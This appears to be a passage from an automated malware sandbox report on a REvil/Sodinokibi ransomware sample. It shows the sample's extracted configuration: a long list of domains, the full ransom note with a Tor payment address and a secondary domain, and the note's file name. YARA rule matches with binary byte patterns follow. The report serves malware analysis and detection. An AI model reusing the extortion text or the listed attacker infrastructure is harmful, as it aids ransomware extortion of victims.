grifarm.dk;rizplakatjaya.com;laaisterplakky.nl;cac2040.com;turing.academy;qandmmusiccenter.com;envomask.com;housesofwa.com;wasnederland.nl;hepishopping.com;hm-com.com;nevadaruralhousingstudies.org;teamsegeln.ch;bcabattoirs.org;christianscholz.de;buerocenter-butzbach-werbemittel.de;oncarrot.com;walterman.es;scentedlair.com;alene.co;cc-experts.de;sweetz.fr;irizar.com;unislaw-narty.pl;palema.gr;atma.nl;thenalpa.com;qwikcoach.com;arearugcleaningnyc.com;cincinnatiphotocompany.org;blucamp.com;fanuli.com.au;heimdalbygg.no;evsynthacademy.org;finsahome.co.uk;dnqa.co.uk;comoserescritor.com;techybash.com;parisschool.ru;singletonfinancial.com;ziliak.com;limmortelyouth.com;bertbutter.nl;hawthornsretirement.co.uk;albcleaner.fr;etgdogz.de;acb-gruppe.ch;larchwoodmarketing.com;tothebackofthemoon.com;kelsigordon.com;tradenavigator.ch;jobkiwi.com.ng;arthakapitalforvaltning.dk;switch-made.com;mneti.ru;atrgroup.it;eventosvirtualesexitosos.com;eos-horlogerie.com;gardenpartner.pl;kookooo.com;heuvelland-oaze.nl;domilivefurniture.com;computer-place.de;stralsund-ansichten.de;carolynfriedlander.com;charlesfrancis.photos;5pointpt.com;sunsolutions.es;shortsalemap.com;ceocenters.com;plbinsurance.com;martinipstudios.com;chorusconsulting.net;internalresults.com;mariajosediazdemera.com;werkzeugtrolley.net;electricianul.com;tweedekansenloket.nl;chinowarehousespace.com;cmeow.com;hawaiisteelbuilding.com;volta.plus;theatre-embellie.fr;zumrutkuyutemel.com;ingresosextras.online;diakonie-weitramsdorf-sesslach.de;web865.com;alwaysdc.com;kemtron.fr;malzomattalar.com;drvoip.com;aidanpublishing.co.uk;sppdstats.com;gbk-tp1.de;omegamarbella.com;ya-elka.ru;lookandseen.com;ufovidmag.com;jameswilliamspainting.com;rivermusic.nl;amorbellezaysalud.com;paardcentraal.nl;bohrlochversicherung.info;brannbornfastigheter.se;precisetemp.com;schluesseldienste-hannover.de;powershell.su;awag-blog.de;monstarrsoccer.com;speiserei-hannover.de;enews-qca.com;klapanvent.ru;kosten-vochtbestrijding.be;voice2biz.com;geoweb.software;lattalvor.com;mac-computer-support-hamburg.de;scietech.academy;rechtenplicht.be;qrs-international.com;nexstagefinancial.com;tesisatonarim.com;bumbipdeco.site;harleystreetspineclinic.com;latableacrepes-meaux.fr;publicompserver.de;billyoart.com;mrkluttz.com;ikzoekgod.be;onlinetvgroup.com;haus-landliebe.de;silkeight.com;curtsdiscountguns.com;premier-iowa.com;furland.ru;campinglaforetdetesse.com;yayasanprimaunggul.org;bavovrienden.nl;sellthewrightway.com;tramadolhealth.com;elliemaccreative.wordpress.com;rino-gmbh.com;imaginekithomes.co.nz;linearete.com;zaczytana.com;cainlaw-okc.com;cxcompany.com;myplaywin3.com;condormobile.fr;annida.it;sytzedevries.com;bagaholics.in;jmmartinezilustrador.com;fbmagazine.ru;ramirezprono.com;kompresory-opravy.com;ketomealprep.academy;kenmccallum.com;block-optic.com;vitormmcosta.com;breakluckrecords.com;lovetzuchia.com;campusescalade.com;janellrardon.com;rarefoods.ro;ziliak.com;egpu.fr;latteswithleslie.com;utilisacteur.fr;smartmind.net;fysiotherapierijnmond.nl;penumbuhrambutkeiskei.com;topvijesti.net;lyricalduniya.com;k-v-f.de;ravage-webzine.nl;baumfinancialservices.com;tanatek.com;muni.pe;mike.matthies.de;rvside.com;hvitfeldt.dk;hartofurniture.com;wg-heiligenstadt.de;der-stempelking.de;andreaskildegaard.dk;collegetennis.info;dierenambulancealkmaar.nl;centuryvisionglobal.com;mgimalta.com;valiant-voice.com;burg-zelem.de;strauchs-wanderlust.info;pureelements.nl;apmollerpension.com;n-newmedia.de;amyandzac.com;animalfood-online.de;cuadc.org;uci-france.fr;istantidigitali.com;teethinadaydentalimplants.com;nationnewsroom.com;otpusk.zp.ua;galaniuklaw.com;hekecrm.com;sbit.ag;spirello.nl;perceptdecor.com;hnkns.com;zuerich-umzug.ch;renderbox.ch;bcmets.info;hospitalitytrainingsolutions.co.uk;mindsparkescape.com;xn--80abehgab4ak0ddz.xn--p1ai;devplus.be;lollachiro.com;olry-cloisons.fr;line-x.co.uk;alpesiberie.com;reputation-medical.online;grafikstudio-visuell.de;watchsale.biz;k-zubki.ru;rokthetalk.com;jefersonalessandro.com;wyreforest.net;sber-biznes.com;haard-totaal.nl;christopherhannan.com;lidkopingsnytt.nu;aceroprime.com;mbuildinghomes.com;cotton-avenue.co.il;skolaprome.eu;framemyballs.com;catering.com;wirmuessenreden.com;blavait.fr;mayprogulka.ru;andrealuchesi.it;diverfiestas.com.es;die-immo-agentur.de;stoneridgemontessori.com;moira-cristescu.com;humanviruses.org;littlesaints.academy;neolaiamedispa.com;placermonticello.com;cp-bap.de;selected-minds.de;coachpreneuracademy.com;aslog.fr;mahikuchen.com;magnetvisual.com;vipcarrental.ae;mundo-pieces-auto.fr;belinda.af;nepressurecleaning.com;fridakids.com;goodboyscustom.com;protoplay.ca;janmorgenstern.com;yuanshenghotel.com;askstaffing.com;wallflowersandrakes.com;creohn.de;apogeeconseils.fr;fskhjalmar.se;leopoldineroux.com;pinthelook.com;xn--ziinoapte-6ld.ro;zwemofficial.nl;redctei.co;sambaglow.com;topautoinsurers.net;tatyanakopieva.ru;bonitabeachassociation.com;brinkdoepke.eu;so-sage.fr;hutchstyle.co.uk;ncjc.ca;tzn.nu;concontactodirecto.com;aoyama.ac;xtensifi.com;ruggestar.ch;slotspinner.com;breathebettertolivebetter.com;dibli.store;ebible.co;gratiocafeblog.wordpress.com;thiagoperez.com;pilotgreen.com;kausette.com;aberdeenartwalk.org;ownidentity.com;spacebel.be;pazarspor.org.tr;factorywizuk.com;professionetata.com;groovedealers.ru;agora-collectivites.com;rs-danmark.dk;poems-for-the-soul.ch;craftron.com;eatyoveges.com;jakubrybak.com;craftingalegacy.com;aheadloftladders.co.uk;oththukaruva.com;nutriwell.com.sg;energosbit-rp.ru;oraweb.net;mariamalmahdi.com;thegetawaycollective.com;charlottelhanna.com;markseymourphotography.co.uk;leatherjees.com;happylublog.wordpress.com;bulyginnikitav.000webhostapp.com;fidelitytitleoregon.com;osn.ro;studionumerik.fr;cops4causes.org;phukienbepthanhdat.com;beandrivingschool.com.au;chatterchatterchatter.com;bluelakevision.com;mustangmarketinggroup.com;rentingwell.com;biodentify.ai;texanscan.org;landgoedspica.nl;digitale-elite.de;stagefxinc.com;physio-lang.de;jollity.hu;liverpoolabudhabi.ae;logosindustries.com;citydogslife.com;metriplica.academy;a-zpaperwork.eu;andermattswisswatches.ch;jandhpest.com;greenrider.nl;brighthillgroup.com;fotoslubna.com;yvesdoin-aquarelles.fr;mariannelemenestrel.com;airvapourbarrier.com;reizenmetkinderen.be;clinic-beethovenstrasse-ag.ch;rapid5kloan.org;mazift.dk;rolleepollee.com;denhaagfoodie.nl;lesyeuxbleus.net;khtrx.com;richardkershawwines.co.za;rishigangoly.com;apiarista.de;goeppinger-teppichreinigung.de;dreamvoiceclub.org;metcalfe.ca;sycamoregreenapts.com;alharsunindo.com;legundschiess.de;thisprettyhair.com;parentsandkids.com;edrickennedymacfoy.com;elex.is;encounter-p.net;thepixelfairy.com;mediogiro.com.ar;limounie.com;birthplacemag.com;alnectus.com;billigeflybilletter.dk;fi-institutionalfunds.com;distrifresh.com;luvinsburger.fr;kamin-somnium.de;glennverschueren.be;elitkeramika-shop.com.ua;saboboxtel.uk;innersurrection.com;alisodentalcare.com;galatee-couture.com;ciga-france.fr;hostingbangladesh.net;domaine-des-pothiers.com;hostastay.com;ox-home.com;skidpiping.de;shrinkingplanet.com;michal-s.co.il;basindentistry.com;baptistdistinctives.org;premiumweb.com.ua:443;letterscan.de;levencovka.ru;fsbforsale.com;imagine-entertainment.com;medicalsupportco.com;explora.nl;lisa-poncon.fr;louiedager.com;johnstonmingmanning.com;narca.net;kuriero.pro;peninggibadan.co.id;craftstone.co.nz;kiraribeaute-nani.com;eyedoctordallas.com;laylavalentine.com;newonestop.com;guohedd.com;thehovecounsellingpractice.co.uk;epsondriversforwindows.com;mamajenedesigns.com;acumenconsultingcompany.com;animation-pro.co.uk;avis.mantova.it;babysitting-hk.helpergo.co;worldproskitour.com;morgansconsult.com;hypogenforensic.com;alabamaroofingllc.com;arabianmice.com;cap29010.it;bringmehope.org;signamedia.de;riffenmattgarage.ch;opt4cdi.com;aciscomputers.com;pubcon.com;agencewho-aixenprovence.fr;promus.ca;dentallabor-luenen.de;schulz-moelln.de;jimprattmediations.com;mesajjongeren.nl;bajova.sk;spartamovers.com;martha-frets-ceramics.nl;epicjapanart.com;go.labibini.ch;raeoflightmusic.com;pankiss.ru;bruut.online;encounter-p.net;photonag.com;nourella.com;licensed-public-adjuster.com;boomerslivinglively.com;autoteamlast.de;leloupblanc.gr;adterium.com;ronielyn.com;devus.de;9nar.com;bakingismyyoga.com;cymru.futbol;randyabrown.com;biketruck.de;ivancacu.com;geitoniatonaggelon.gr;mikegoodfellow.co.uk;sarahspics.co.uk;belofloripa.be;neonodi.be;ocduiblog.com;santastoy.store;cssp-mediation.org;smartworkplaza.com;katherinealy.com;ludoil.it;jdscenter.com;sharonalbrightdds.com;fire-space.com;saberconcrete.com;letsstopsmoking.co.uk;whoopingcrane.com;ruggestar.ch;iactechnologies.net;5thactors.com;internestdigital.com;glas-kuck.de;jeanmonti.com;ziliak.com;golfclublandgoednieuwkerk.nl;nauticmarine.dk;fluzfluzrewards.com;t3brothers.com;jobstomoveamerica.org;forskolinslimeffect.net;nuohous.com;anleggsregisteret.no;dcc-eu.com;keuken-prijs.nl;opticahubertruiz.com;brownswoodblog.com;fta-media.com;pro-gamer.pl;ced-elec.com;mindfuelers.com;endstarvation.com;tastevirginia.com;stabilisateur.fr;b3b.ch;triplettagaite.fr;factoriareloj.com;global-migrate.com;ronaldhendriks.nl;jonnyhooley.com;soundseeing.net;yournextshoes.com;kickittickets.com;dantreranch.com;scotlandsroute66.co.uk;oportowebdesign.com;motocrosshideout.com;aquacheck.co.za;theater-lueneburg.de;adaduga.info;production-stills.co.uk;rossomattonecase.it;kryddersnapsen.dk;linkbuilding.life;gosouldeep.com;denverwynkoopdentist.com;verbouwingsdouche.nl;lapponiasafaris.com;tutvracks.com;agriturismocastagneto.it;rozmata.com;paprikapod.com;lmmont.sk;makingmillionaires.net;acornishstudio.co.uk;corporacionrr.com;orchardbrickwork.com;from02pro.com;cookinn.nl;the-cupboard.co.uk;interlinkone.com;liepertgrafikweb.at;simpleitsolutions.ch;campusce.com;gurutechnologies.net;tellthebell.website;uncensoredhentaigif.com;nepal-pictures.com;rtc24.com;oro.ae;initconf.com;zinnystar.com;ledyoucan.com;slideevents.be;anchelor.com;pharmeko-group.com;citiscapes-art.com;dayenne-styling.nl;tbalp.co.uk;nxtstg.org;astrographic.com;nieuwsindeklas.be;pisofare.co;advancedeyecare.com;pajagus.fr;mediahub.co.nz;donau-guides.eu;g2mediainc.com;sprintcoach.com;dinedrinkdetroit.com;radishallgood.com;palmenhaus-erfurt.de;jlgraphisme.fr;lassocrm.com;netadultere.fr;mrmac.com;renehartman.nl;graygreenbiomedservices.com;berdonllp.com;globalcompliancenews.com;sololibrerie.it;auberives-sur-vareze.fr;eastgrinsteadwingchun.com;livelai.com;napisat-pismo-gubernatoru.ru:443;fitnessblenderstory.com;expohomes.com;mjk.digital;2020hindsight.info;cyberpromote.de;hensleymarketing.com;innovationgames-brabant.nl;artcase.pl;stathmoulis.gr;mediabolmong.com;kellengatton.com;ncn.nl;3daywebs.com;cleanroomequipment.ie;nalliasmali.net;advesa.com;buzzneakers.com;handyman-silkeborg.dk;billscars.net;catalyseurdetransformation.com;espaciopolitica.com;gatlinburgcottage.com;ninjaki.com;delegationhub.com;nrgvalue.com;focuskontur.com;nykfdyrehospital.dk;skyboundnutrition.co.uk;asiaartgallery.jp;wrinstitute.org;itheroes.dk;jalkapuu.net;amco.net.au;phoenixcrane.com;csaballoons.com;smartercashsystem.com;dentalcircle.com;trainiumacademy.com;operativadigital.com;tages-geldvergleich.de;blueridgeheritage.com;polynine.com;kristianboennelykke.dk;eafx.pro;victorvictoria.com;noda.com.ua;awaisghauri.com;bendel-partner.de;pixelhealth.net;janasfokus.com;goodherbalhealth.com;universelle.fr;eshop.design;endlessrealms.net;brisbaneosteopathic.com.au;secrets-clubs.co.uk;stressreliefadvice.com;sealgrinderpt.com;jag.me;suonenjoen.fi;mrcar.nl;antesacademy.it;mind2muscle.nl;1deals.com;ayudaespiritualtamara.com;alcye.com;advance-refle.com;profibersan.com;tetameble.pl;broccolisoep.nl;direitapernambuco.com;kerstliedjeszingen.nl;cardsandloyalty.com;sshomme.com;p-ride.live;ideamode.com;ygallerysalonsoho.com:443;fazagostar.co;scholarquotes.com;claudiakilian.de;karmeliterviertel.com;patriotcleaning.net;bescomedical.de;mercadodelrio.com", "net": true, "nbody": "---=== Welcome. Again. ===---\r\n\r\n[+] Whats Happen? [+]\r\n\r\nYour files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}.\r\nBy the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).\r\n\r\n[+] What guarantees? [+]\r\n\r\nIts just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.\r\nTo check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.\r\nIf you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.\r\n\r\n[+] How to get access on website? [+]\r\n\r\nYou have two ways:\r\n\r\n1) [Recommended] Using a TOR browser!\r\n  a) Download and install TOR browser from this site: https://torproject.org/\r\n  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}\r\n\r\n2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:\r\n  a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)\r\n  b) Open our secondary website: http://decryptor.top/{UID}\r\n\r\nWarning: secondary website can be blocked, thats why first variant much better and more available.\r\n\r\nWhen you open our website, put the following data in the input form:\r\nKey:\r\n\r\n{KEY}\r\n\r\n\r\nExtension name:\r\n\r\n{EXT}\r\n\r\n-----------------------------------------------------------------------------------------\r\n\r\n!!! DANGER !!!\r\nDONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.\r\n!!! !!! !!!\r\nONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.\r\n!!! !!! !!!\u0000", "nname": "{EXT}-readme.txt", "exp": true, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA"}
SourceRuleDescriptionAuthorStrings
myfile.exeJoeSecurity_RevilYara detected RevilJoe Security
    myfile.exeWindows_Ransomware_Sodinokibi_83f05fbeIdentifies SODINOKIBI/REvil ransomwareunknown
    • 0x85ab:$d1: 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C ...
    • 0x17540:$d2: 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B
    • 0x82e5:$d3: F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 ...
    • 0x926a:$d4: 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 ...
    • 0x8f8b:$d5: C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 ...
    • 0x8160:$d6: 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 ...
    • 0x8ef8:$d7: 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF ...
    • 0x1a000:$d8: 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35
    • 0x935b:$d9: C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 E1 0C 0F AC D6 14 0B C6 C1 EA 14 ...
    • 0x828b:$d10: 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 ...
    • 0x8d54:$d11: 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0
    • 0x91d4:$d12: 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A
    • 0x8233:$d13: F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2
    • 0x89a6:$d14: 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8
    myfile.exeWindows_Ransomware_Sodinokibi_a282ba44Identifies SODINOKIBI/REvil ransomwareunknown
    • 0x3e99:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83
    • 0x4a65:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF
    • 0x5c13:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55
    • 0x8f7b:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F
    • 0x957d:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89
    • 0xa615:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
    myfile.exeREvilREvil PayloadR3MRUM
    • 0x17540:$RE1: expand 32-byte kexpand 16-byte k
    • 0xbc30:$RE2: sysshadow
    • 0x107f8:$RE2: sysshadow
    • 0x14470:$RE2: sysshadow
    • 0xbc50:$RE3: SCROLLBAR
    • 0x10810:$RE3: SCROLLBAR
    • 0x14488:$RE3: SCROLLBAR
    • 0xbc40:$RE4: msctfime ui
    • 0x10804:$RE4: msctfime ui
    • 0x1447c:$RE4: msctfime ui
    • 0xbc60:$RE5: \BaseNamedObjects\%S
    • 0x1081c:$RE5: \BaseNamedObjects\%S
    • 0x14494:$RE5: \BaseNamedObjects\%S
    • 0x4e1d:$decode: 33 D2 8A 9C 3D FC FE FF FF 8B C7 0F B6 CB F7 75 0C 8B 45 08 0F B6 04 02 03 C6 03 C8 0F B6 F1 8A 84 35 FC FE FF FF 88 84 3D FC FE FF FF 47 88 9C 35 FC FE FF FF 81 FF 00 01 00 00 72 C3
    myfile.exeWin32_Ransomware_RevilunknownReversingLabs
    • 0x5699:$search_files: 55 8B EC 81 EC 68 02 00 00 53 56 8B 75 08 33 C0 57 8B 7D 0C 8B D8 50 56 89 45 F4 89 5D F0 89 45 F8 89 45 FC FF 57 04 59 59 85 C0 0F 84 AC 01 00 00 8D 45 F0 56 50 E8 B7 02 00 00 53 56 FF 77 0C ...
    • 0x5c26:$remote_connection: 55 8B EC 81 EC 5C 01 00 00 56 57 8D 85 A4 FE FF FF 50 68 90 00 00 00 6A 04 68 E7 04 00 00 68 28 CC 41 00 E8 B5 E5 FF FF 83 C4 14 33 F6 33 C0 66 89 85 34 FF FF FF 8D 85 A4 FE FF FF 56 56 56 56 ...
    • 0x1ca9:$encrypt_files: 55 8B EC 51 83 7D 14 00 53 56 57 BB 00 00 10 00 7F 0A 7C 05 39 5D 10 73 03 8B 5D 10 8B 7D 08 8D 83 58 01 00 00 50 57 E8 9A 38 00 00 59 59 EB 21 E8 AA 1C 00 00 83 F8 08 75 2F 6A 64 E8 6A 20 00 ...
    • 0x5a7a:$enum_resources: 55 8B EC 83 EC 10 8D 45 F8 50 FF 75 0C 6A 00 6A 01 6A 02 FF 15 48 CB 41 00 85 C0 74 07 33 C0 E9 9D 00 00 00 83 4D FC FF B8 00 40 00 00 57 50 89 45 F4 E8 6D D5 FF FF 8B F8 59 85 FF 75 0D FF 75 ...
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Sodinokibi_a282ba44Identifies SODINOKIBI/REvil ransomwareunknown
    • 0x3a99:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83
    • 0x4665:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF
    • 0x5813:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55
    • 0x8b7b:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F
    • 0x917d:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89
    • 0xa215:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
    00000000.00000000.1647049931.0000000000271000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Sodinokibi_a282ba44Identifies SODINOKIBI/REvil ransomwareunknown
    • 0x3a99:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83
    • 0x4665:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF
    • 0x5813:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55
    • 0x8b7b:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F
    • 0x917d:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89
    • 0xa215:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
    Process Memory Space: myfile.exe PID: 7156JoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
      Process Memory Space: myfile.exe PID: 7156JoeSecurity_ChaosYara detected Chaos RansomwareJoe Security
        Process Memory Space: myfile.exe PID: 7156JoeSecurity_PythonRansomwareYara detected Python RansomwareJoe Security
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          0.0.myfile.exe.270000.0.unpackJoeSecurity_RevilYara detected RevilJoe Security
            0.0.myfile.exe.270000.0.unpackWindows_Ransomware_Sodinokibi_83f05fbeIdentifies SODINOKIBI/REvil ransomwareunknown
            • 0x85ab:$d1: 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C ...
            • 0x17540:$d2: 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B
            • 0x82e5:$d3: F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 ...
            • 0x926a:$d4: 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 ...
            • 0x8f8b:$d5: C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 ...
            • 0x8160:$d6: 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 ...
            • 0x8ef8:$d7: 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF ...
            • 0x1a000:$d8: 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35
            • 0x935b:$d9: C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 E1 0C 0F AC D6 14 0B C6 C1 EA 14 ...
            • 0x828b:$d10: 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 ...
            • 0x8d54:$d11: 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0
            • 0x91d4:$d12: 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A
